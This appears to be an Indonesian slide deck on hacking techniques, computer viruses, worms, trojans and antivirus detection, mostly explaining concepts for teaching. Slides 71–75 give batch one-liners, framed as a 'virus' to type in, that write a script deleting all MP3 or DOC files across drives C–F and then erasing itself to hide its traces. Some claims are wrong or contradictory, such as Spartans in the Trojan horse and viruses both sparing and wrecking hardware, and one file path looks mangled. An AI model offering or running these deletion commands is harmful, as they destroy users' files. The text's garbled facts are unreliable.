  • 33. Teknik hacking - Denial of service Teknik ini dilakukan dengan cara membuat permintaan yang sangat banyak terhadap suatu situs sehingga sistem menjadi macet, dan kemudian dengan mencari kelemahan sistem, pelaku melakukan serangan terhadap sistem.
  • 34. Teknik hacking - Sniffer • Teknik ini dilakukan dengan membuat program yang dapat melacak paket data seseorang ketika paket tersebut melintasi internet, menangkap password atau isinya.
  • 35. Teknik hacking - Spoofing Pemalsuan alamat email atau web dengan tujuan menjebak pemakai agar memasukkan informasi yang penting seperti password atau nomor kartu kredit.
  • 36. Teknik hacking - Logic bomb dan time bomb Program yang beraksi karena dipicu oleh suatu kejadian atau setelah selang waktu tertentu.
  • 37. Teknik hacking - Virus • Program komputer yang dapat menggandakan atau menyalin dirinya sendiri dan menyebar dengan cara menyisipkan salinan dirinya ke dalam program atau dokumen lain. • Virus komputer dapat dianalogikan dengan virus biologis yang menyebar dengan cara menyisipkan dirinya sendiri ke sel makhluk hidup. • Virus komputer dapat merusak (misalnya dengan merusak data pada dokumen), membuat pengguna komputer merasa terganggu, maupun tidak menimbulkan efek sama sekali.
  • 38. • Virus komputer umumnya dapat merusak perangkat lunak komputer dan tidak dapat secara langsung merusak perangkat keras komputer tetapi dapat mengakibatkan kerusakan dengan cara memuat program yang memaksa over process ke perangkat tertentu. • Efek negatif virus komputer adalah memperbanyak dirinya sendiri, yang membuat sumber daya pada komputer (seperti penggunaan memori) menjadi berkurang secara signifikan. • Hampir 95% virus komputer berbasis sistem operasi Windows. Sisanya menyerang Linux/GNU, Mac, FreeBSD, OS/2IBM, dan Sun Operating System. • Virus yang ganas akan merusak perangkat keras.
  • 39. KRITERIA VIRUS KOMPUTER 1. Kemampuan untuk mendapatkan informasi 2. Kemampuannya untuk memeriksa suatu program 3. Kemampuannya untuk menggandakan diri dan menularkan 4. Kemampuannya melakukan manipulasi 5. Kemampuannya untuk menyembunyikan diri
  • 40. • KEMAMPUAN UNTUK MENDAPATKAN INFORMASI Pada umumnya suatu virus memerlukan daftar nama-nama file yang ada dalam suatu directory, agar dia dapat mengenali program program apa saja yang akan dia tulari,semisal virus makro yang akan menginfeksi semua file berekstensi *.doc setelah virus itu menemukannya, disinilah kemampuan mengumpulkan informasi itu diperlukan agar virus dapat membuat daftar/data semua file, terus memilahnya dengan mencari file-file yang bisa ditulari.Biasanya data ini tercipta saat program yang tertular/terinfeksi atau bahkan program virus ini dieksekusi. Sang virus akan segera melakukan pengumpulan data dan menaruhnya di RAM, sehingga apabila komputer dimatikan semua data hilang tetapi akan tercipta setiap program bervirus dijalankan dan biasanya dibuat sebagai hidden file oleh virus .
  • 41. • KEMAMPUAN MEMERIKSA SUATU PROGRAM Suatu virus juga harus bisa untuk memeriksa suatu program yang akan ditulari, misalnya ia bertugas menulari program berekstensi *.doc, dia harus memeriksa apakah file dokumen ini telah terinfeksi ataupun belum, karena jika sudah terinfeksi, maka dia akan percuma menularinya 2 kali. Ini sangat berguna untuk meningkatkan kemampuan suatu virus dalam hal kecepatan menginfeksi suatu file/program. Yang umum dilakukan oleh virus adalah memiliki/ memberi tanda pada file/program yang telah terinfeksi sehingga mudah untuk dikenali oleh virus tersebut . Contoh penandaan adalah misalnya memberikan suatu byte yang unik disetiap file yang telah terinfeksi.
  • 42. • KEMAMPUAN UNTUK MENGGANDAKAN DIRI Inti dari virus adalah kemampuan mengandakan diri dengan cara menulari program lainnya. Suatu virus apabila telah menemukan calon korbannya (baik file atau program) maka ia akan mengenalinya dengan memeriksanya, jika belum terinfeksi maka sang virus akan memulai aksinya untuk menulari dengan cara menuliskan byte pengenal pada program/file tersebut, dan seterusnya mengcopikan/menulis kode objek virus diatas file/program yang diinfeksi. Beberapa cara umum yang dilakukan oleh virus untuk menulari/ menggandakan dirinya adalah:
  • 43. a. File/Program yang akan ditulari dihapus atau diubah namanya, kemudian diciptakan suatu file menggunakan nama itu dengan menggunakan virus tersebut (maksudnya virus mengganti namanya dengan nama file yang dihapus). b. Program virus yang sudah di eksekusi/load ke memori akan langsung menulari file-file lain dengan cara menumpangi seluruh file/program yang ada.
  • 44. • KEMAMPUAN MENGADAKAN MANIPULASI Rutin (routine) yang dimiliki suatu virus akan dijalankan setelah virus menulari suatu file/program. Isi dari suatu rutin ini dapat beragam mulai dari yang teringan sampai pengrusakan. Rutin ini umumnya digunakan untuk memanipulasi program ataupun mempopulerkan pembuatnya. Rutin ini memanfaatkan kemampuan dari suatu sistem operasi (Operating System) , sehingga memiliki kemampuan yang sama dengan yang dimiliki sistem operasi.
  • 45. • KEMAMPUAN MENYEMBUNYIKAN DIRI Kemampuan Menyembunyikan diri ini harus dimiliki oleh suatu virus agar semua pekerjaan baik dari awal sampai berhasilnya penularan dapat terlaksana. Langkah-langkah yang biasa dilakukan adalah: - Program asli/virus disimpan dalam bentuk kode mesin dan digabung dengan program lain yang dianggap berguna oleh pemakai. - Program virus diletakkan pada Boot Record atau track yang jarang diperhatikan oleh komputer itu sendiri. - Program virus dibuat sependek mungkin, dan hasil file yang diinfeksi tidak berubah ukurannya. - Virus tidak mengubah keterangan waktu suatu file, dll.
  • 46. SIKLUS HIDUP VIRUS SECARA UMUM MELALUI 4 TAHAP • Dormant phase ( Fase Istirahat/Tidur ) Pada fase ini virus tidaklah aktif. Virus akan diaktifkan oleh suatu kondisi tertentu, semisal:tanggal yang ditentukan,kehadiran program lain/dieksekusinya program lain, dsb. Tidak semua virus melalui fase ini. • Propagation phase ( Fase Penyebaran ) Pada fase ini virus akan mengkopikan dirinya kepada suatu program atau ke suatu tempat dari media storage (baik hardisk, ram dsb). Setiap program yang terinfeksi akan menjadi hasil “klonning” virus tersebut (tergantung cara virus tersebut menginfeksinya).
  • 47. • Trigerring phase ( Fase Aktif ) Di fase ini virus tersebut akan aktif dan hal ini juga di picu oleh beberapa kondisi seperti pada Dormant phase. • Execution phase ( Fase Eksekusi ) Pada Fase inilah virus yang telah aktif tadi akan melakukan fungsinya. Seperti menghapus file, menampilkan pesan-pesan, dsb.
  • 49. Worm Cacing computer atau juga di sebut worm (bahasa Inggris: computer worm atau worm) dalam keamanan komputer, adalah sebuah program komputer yang dapat menggandakan dirinya secara sendiri dalam sistem komputer. Sebuah worm dapat menggandakan dirinya dengan memanfaatkan jaringan (LAN/WAN/Internet) tanpa perlu campur tangan dari user itu sendiri. Worm tidak seperti virus komputer biasa, yang menggandakan dirinya dengan cara menyisipkan program dirinya pada program yang ada dalam komputer tersebut, tapi worm memanfaatkan celah keamanaan yang memang terbuka atau lebih dikenal dengan sebutan vulnerability. Beberapa worm juga menghabiskan bandwidth yang tersedia. Worm merupakan evolusi dari virus komputer. Worm - Menduplikatkan dirinya sendiri pada harddisk. Ini membuat sumber daya komputer (Harddisk) menjadi penuh akan worm itu.
  • 50. Hanya ada satu cara untuk mengatasi worm yaitu dengan menutup celah keamanan yang terbuka tersebut, dengan cara meng-update patch atau Service Pack dari operating sistem yang digunakan dengan patch atau Service Pack yang paling terbaru. Virus komputer memang dapat menginfeksi berkas-berkas dalam sebuah sistem komputer, tapi worm dapat melakukannya dengan lebih baik. Selain dapat menyebar dalam sebuah sistem, worm juga dapat menyebar ke banyak sistem melalui jaringan yang terhubung dengan sistem yang terinfeksi. Beberapa worm, juga dapat mencakup kode-kode virus yang dapat merusak berkas, mencuri dokumen, e-mail, atau melakukan hal lainnya yang merusak, atau hanya menjadikan sistem terinfeksi tidak berguna.
  • 51. Beberapa contoh dari worm adalah sebagai berikut: • ADMw0rm: Worm yang dapat melakukan eksploitasi terhadap layanan jaringan Berkeley Internet Name Domain (BIND), dengan melakukan buffer-overflow. • Code Red: Worm yang dapat melakukan eksploitasi terhadap layanan Internet Information Services (IIS) versi 4 dan versi 5, dengan melakukan serangan buffer-overflow. • LoveLetter: Worm yang menyebar dengan cara mengirimkan dirinya melalui e-mail kepada semua akun yang terdaftar dalam Address Book Microsoft Outlook Express/daftar kontak dalam Microsoft Outlook dengan cara menggunakan kode Visual Basic Script (VBScript). • Nimda • SQL-Slammer
  • 52. Trojan Horse Trojan horse atau Kuda Troya atau yang lebih dikenal sebagai Trojan dalam keamanan komputer merujuk kepada sebuah bentuk perangkat lunak yang mencurigakan (malicious software/malware) yang dapat merusak sebuah sistem atau jaringan. Tujuan dari Trojan adalah memperoleh informasi dari target (password, kebiasaan user yang tercatat dalam system log, data, dan lain-lain), dan mengendalikan target (memperoleh hak akses pada target). Trojan - Mengambil data pada komputer yang telah terinfeksi dan mengirimkannya pada pembuat trojan itu sendiri.
  • 53. Cara Kerja: Trojan berbeda dengan jenis perangkat lunak mencurigakan lainnya seperti virus komputer atau worm karena dua hal berikut: Trojan bersifat "stealth" (siluman dan tidak terlihat) dalam operasinya dan seringkali berbentuk seolah-olah program tersebut merupakan program baik-baik, sementara virus komputer atau worm bertindak lebih agresif dengan merusak sistem atau membuat sistem menjadi crash. Trojan dikendalikan dari komputer lain (komputer attacker).
  • 54. Cara Penyebaran: Penggunaan istilah Trojan atau Trojan horse dimaksudkan untuk menyusupkan kode-kode mencurigakan dan merusak di dalam sebuah program baik-baik dan berguna; seperti halnya dalam Perang Troya, para prajurit Sparta bersembunyi di dalam Kuda Troya yang ditujukan sebagai pengabdian kepada Poseidon. Kuda Troya tersebut menurut para petinggi Troya dianggap tidak berbahaya, dan diizinkan masuk ke dalam benteng Troya yang tidak dapat ditembus oleh para prajurit Yunani selama kurang lebih 10 tahun perang Troya bergejolak
  • 55. Kebanyakan Trojan saat ini berupa sebuah berkas yang dapat dieksekusi (*.EXE atau *.COM dalam sistem operasi Windows dan DOS atau program dengan nama yang sering dieksekusi dalam sistem operasi UNIX, seperti ls, cat, dan lain-lain) yang dimasukkan ke dalam sistem yang ditembus oleh seorang cracker untuk mencuri data yang penting bagi pengguna (password, data kartu kredit, dan lain-lain). Trojan juga dapat menginfeksi sistem ketika pengguna mengunduh aplikasi (seringnya berupa game komputer) dari sumber yang tidak dapat dipercayai dalam jaringan Internet. Aplikasi-aplikasi tersebut dapat memiliki kode Trojan yang diintegrasikan di dalam dirinya dan mengizinkan seorang cracker untuk dapat mengacak-acak sistem yang bersangkutan.
  • 56. • Backdoor - Hampir sama dengan trojan. Namun, Backdoor bisanya menyerupai file yang baik-baik saja. Misalnya game. • Spyware - Spyware merupakan turunan dari adware, yang memantau kebiasaan pengguna dalam melakukan penjelajahan Internet untuk mendatangkan "segudang iklan" kepada pengguna. Tetapi, karena adware kurang begitu berbahaya (tidak melakukan pencurian data), spyware melakukannya dan mengirimkan hasil yang ia kumpulkan kepada pembuatnya (adware umumnya hanya mengirimkan data kepada perusahaan marketing).
  • 57. • Rogue - merupakan program yang meniru program antivirus dan menampilkan aktivitas layaknya antivirus normal, dan memberikan peringatan-peringatan palsu tentang adanya virus. Tujuannya adalah agar pengguna membeli dan mengaktivasi program antivirus palsu itu dan mendatangkan uang bagi pembuat virus rogue tersebut. Juga rogue dapat membuka celah keamanan dalam komputer guna mendatangkan virus lain. • Rootkit - Virus yang bekerja menyerupai kerja sistem komputer yang biasa saja.
  • 58. • Polymorphic virus - Virus yang gemar berubah-ubah agar tidak dapat terdeteksi. • Metamorphic virus - Virus yang mengubah pengkodeannya sendiri agar lebih sulit dideteksi. • Virus ponsel - Virus yang berjalan di telepon seluler, dan dapat menimbulkan berbagai macam efek, mulai dari merusak telepon seluler, mencuri data-data di dalam telepon seluler, sampai membuat panggilan-panggilan diam-diam dan menghabiskan pulsa pengguna telepon seluler.
  • 59. KATEGORI VIRUS KOMPUTER • VIRUS MAKRO Jenis Virus ini pasti sudah sangat sering kita dengar. Virus ini ditulis dengan bahasa pemrograman dari suatu aplikasi bukan dengan bahasa pemrograman dari suatu Operating System. Virus ini dapat berjalan apabila aplikasi pembentuknya dapat berjalan dengan baik, maksudnya jika komputer dengan OS Windows 7 dapat menjalankan aplikasi ms. words, maka virus ini bekerja pada komputer bersistem operasi Windows 7
  • 60. Contoh virus: - Variant W97M, misal W97M.Panther Panjang 1234 bytes, akan menginfeksi NORMAL.DOT dan menginfeksi dokumen apabila dibuka. - WM.Twno.A;TW, panjang 41984 bytes, akan menginfeksi Dokumen Ms.Word yang menggunakan bahasa makro, biasanya berekstensi *.DOT dan *.DOC, dll.
  • 61. • VIRUS BOOT SECTOR Virus Boot sector ini sudah umum sekali menyebar.Virus ini dalam menggandakan dirinya akan memindahkan atau menggantikan boot sector asli dengan program booting virus. Sehingga saat terjadi booting maka virus akan di load kememori dan selanjutnya virus akan mempunyai kemampuan mengendalikan hardware standar(ex::monitor, printer dsb) dan dari memori ini pula virus akan menyebar keseluruh drive yang ada dan terhubung kekomputer (ex: floopy, drive lain selain drive c).
  • 62. Contoh virus : I. Varian virus wyx ex: wyx.C(B), menginfeksi boot record dan floopy; panjang : 520 bytes, karakteristik : memory resident dan terenkripsi. II. Varian V-sign, menginfeksi master boot record; panjang 520 bytes; karakteristik: menetap di memori (memory resident), terenkripsi, dan polymorphic) III. Stoned.june 4th/ bloody, menginfeksi Master boot record dan floopy; panjang 520 bytes; karakteristik: menetap di memori (memory resident), terenkripsi dan menampilkan pesan"Bloody!june 4th 1989" setelah komputer melakukan booting sebanyak 128 kali.
  • 63. • STEALTH VIRUS Virus ini akan menguasai tabel tabel interupt pada DOS yang sering kita kenal dengan “Interrupt interceptor”. Virus ini berkemampuan untuk mengendalikan instruksi instruksi level DOS dan biasanya mereka tersembunyi sesuai namanya baik secara penuh ataupun ukurannya. Contoh virus : - Yankee.XPEH.4928, menginfeksi file *.COM dan *.EXE ; panjang 4298 bytes; karakteristik: menetap di memori, ukuran tersembunyi, memiliki pemicu.
  • 64. - WXYC (yang termasuk kategori boot record pun karena masuk kategri stealth dimasukkan pula disini), menginfeksi floopy an motherboot record; panjang 520 bytes; menetap di memori; ukuran dan virus tersembunyi. - Vmem(s), menginfeksi file file *.EXE, *.SYS, dan *.COM; panjang fie 3275 bytes; karakteristik:menetap di memori, ukuran tersembunyi, di enkripsi dll.
  • 65. • POLYMORPHIC VIRUS Virus ini Dirancang buat mengecoh program antivirus, artinya virus ini selalu berusaha agar tidak dikenali oleh antivirus dengan cara selalu merubah rubah strukturnya setiap kali selesai menginfeksi file/program lain. Contoh virus: - Necropolis A/B, menginfeksi file *.EXE dan *.COM; panjang file 1963 bytes; karakteristik: menetap di memori, ukuran dan virus tesembunyi,terenkripsi dan dapat berubah ubah struktur.
  • 66. - Nightfall, menginfeksi file *.EXE; panjang file 4554 bytes; karakteristik : menetap di memori, ukuran dan virus tersembunyi,memiliki pemicu, terenkripsi dan dapat berubah-ubah struktur dll. • VIRUS FILE/PROGRAM Virus ini menginfeksi file file yang dapat dieksekusi langsung dari sistem operasi, baik itu file application (*.EXE), maupun *.COm biasanya juga hasil infeksi dari virus ini dapat diketahui dengan berubahnya ukuran file yang diserangnya.
  • 67. • MULTI PARTITION VIRUS Virus ini merupakan gabungan dari Virus Boot sector dan Virus file: artinya pekerjaan yang dilakukan berakibat dua, yaitu dia dapat menginfeksi file-file *.EXE dan juga menginfeksi Boot Sector.
  • 68. Cara mengatasi • Serangan virus dapat dicegah atau ditanggulangi dengan menggunakan Software antivirus. • Jenis perangkat lunak ini dapat juga mendeteksi dan menghapus virus komputer. • Virus komputer ini dapat dihapus dengan basis data (database/ Signature-based detection), heuristik, atau peringkat dari program itu sendiri (Quantum).
  • 69. • Pendeteksian dengan menggunakan basis data virus signature (virus signature database): • Cara kerja antivirus ini merupakan pendekatan yang banyak digunakan oleh antivirus tradisional, yang mencari tanda-tanda dari keberadaan dari virus dengan menggunakan sebagian kecil dari kode virus yang telah dianalisis oleh vendor antivirus, dan telah dikatalogisasi sesuai dengan jenisnya, ukurannya, daya hancurnya dan beberapa kategori lainnya.
  • 70. • Pendeteksian dengan melihat cara bagaimana virus bekerja: Cara kerja antivirus seperti ini merupakan pendekatan yang baru yang dipinjam dari teknologi yang diterapkan dalamIntrusion Detection System (IDS). • Cara ini sering disebut juga sebagai Behavior-blocking detection. Cara ini menggunakan policy (kebijakan) yang harus diterapkan untuk mendeteksi keberadaan sebuah virus. • Jika ada kelakuan perangkat lunak yang "tidak wajar" menurut policy yang diterapkan, seperti halnya perangkat lunak yang mencoba untuk mengakses address book untuk mengirimkan e-mail secara massal terhadap daftar e-mail yang berada di dalam address book tersebut (cara ini sering digunakan oleh virus untuk menularkan virus melalui e-mail), maka antivirus akan menghentikan proses yang dilakukan oleh perangkat lunak tersebut.
  • 71. Contoh Program Virus di DOS Prompt Yang perlu Anda ketikkan dalam DOS adalah: • echo for %%p in (C:hack) do del *.mp3 %0 %%p:>virusdot.bat
  • 72. • Maka akan muncul seekor virus yang bernama virus.dot dalam folder yang aktif.
  • 73. • virus bekerja dengan menghapus semua file MP3 yang ada di dalamnya. Termasuk virus itu sendiri menghilangkan dirinya, untuk menghapus jejak.
  • 74. • Apabila dimodifikasi supaya virus tersebut dapat menghapus dalam semua drive, bentuk syntax-nya adalah: • echo for %%p in (C D E F) do del *.mp3 %0 %%p:>virusdot.bat • Nanti, virus akan menyusup ke drive C, D, E, dan F untuk menghapus file MP3.
  • 75. • Apabila berniat jenis file tertentu, katakanlah file dokumen (DOC), syntax-nya menjadi: • echo for %%p in (C D E F) do del *.doc %0 %%p:>virusdot.bat